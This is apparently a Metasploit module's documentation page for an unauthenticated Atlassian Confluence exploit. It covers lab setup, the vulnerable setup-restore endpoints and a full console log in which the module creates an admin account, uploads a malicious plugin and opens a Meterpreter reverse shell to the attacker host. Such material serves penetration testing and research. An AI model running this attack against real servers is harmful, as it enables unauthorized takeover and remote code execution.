adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/multi/http/atlassian_confluence_unauth_backup.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

109 lines
5.2 KiB
Markdown
Raw Normal View History

Documentation and rubocop changes
2023-12-11 19:01:35 -05:00
## Vulnerable Application
This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a
Confluence instance administrator account. Using this account, an attacker can then perform all
administrative actions that are available to Confluence instance administrator. This module uses the
administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code
execution on the target in the context of the of the user running the confluence server.
### Setup
Download and install a [vulnerable version of Atlassian Confluence](https://www.atlassian.com/software/confluence/download.).
By default the server will listen for HTTP connections on port 8090. This exploit module was tested against Confluence
8.5.1 running on Windows Server 2022.
After running the installer the setup wizard will ask for a trial license. An Atlassian account is free and required
to obtain the trial licence. A database and a will also be required to run Confluence. Download and install
[PostgreSQL](https://www.enterprisedb.com/downloads/postgres-postgresql-downloads). The setup Wizard will ask for DB
credentials, the default PostgreSQL database can be used.
## Verification Steps
1. Start msfconsole
1. Do: `use atlassian_confluence_unauth_backup`
1. Set the `RHOST`
1. Run the module
1. Receive a Meterpreter session in the context of the user running the Confluence application.
## Options
### CONFLUENCE_TARGET_ENDPOINT
This is the endpoint used to trigger the vulnerability, and must be reachable by an un authenticated HTTP(S) POST
request. The three vulnerable endpoints outlined by Atlassian in the advisory for this vulnerability are as follows:
- /json/setup-restore.action
- /json/setup-restore-local.action
- /json/setup-restore-progress.action'
### CONFLUENCE_PLUGIN_TIMEOUT
The exploit will install a malicious plugin into the Confluence server. Plugin installation is performed asynchronously
and we must poll the server to find out when installation has completed. This option governs the maximum amount
of time to wait for installation to complete. The timeout value is in seconds and by default this option is set to `30`.
## Scenarios
### Windows Server 2022 running Atlassian Confluence 8.5.1
```
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > set rhost 172.16.199.134
rhost => 172.16.199.134
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > set verbose true
verbose => true
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > options
Module options (exploit/multi/http/atlassian_confluence_unauth_backup):
Name Current Setting Required Description
---- --------------- -------- -----------
CONFLUENCE_PLUGIN_TIMEOUT 30 yes The timeout (in seconds) to wait when installing a plugin
CONFLUENCE_TARGET_ENDPOINT /json/setup-restore.action yes The endpoint used to trigger the vulnerability. (Accepted: /json/setup-restore.action, /json/setup-restore-local.action, /json/setup-restore-progress.action)
NEW_PASSWORD LELTtnOG yes Password to be used when creating a new user with admin privileges
NEW_USERNAME candace.leffler yes Username to be used when creating a new user with admin privileges
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.16.199.134 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8090 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Java
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable version of Confluence: 8.5.1
[*] Setting credentials: candace.leffler:LELTtnOG
[+] Exploit Success! Login Using 'candace.leffler :: LELTtnOG'
[*] Generating payload plugin
[*] Uploading payload plugin
[*] Triggering payload plugin
[*] Deleting plugin...
[*] Sending stage (57692 bytes) to 172.16.199.134
[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.134:50095) at 2023-12-11 18:52:33 -0500
meterpreter > getuid
Server username: WIN-2EEL7BRDUD8$
meterpreter > sysinfo
Computer : WIN-2EEL7BRDUD8
OS : Windows Server 2022 10.0 (amd64)
Architecture : x64
System Language : en_US
Meterpreter : java/windows
meterpreter >
```
Reference in New Issue Copy Permalink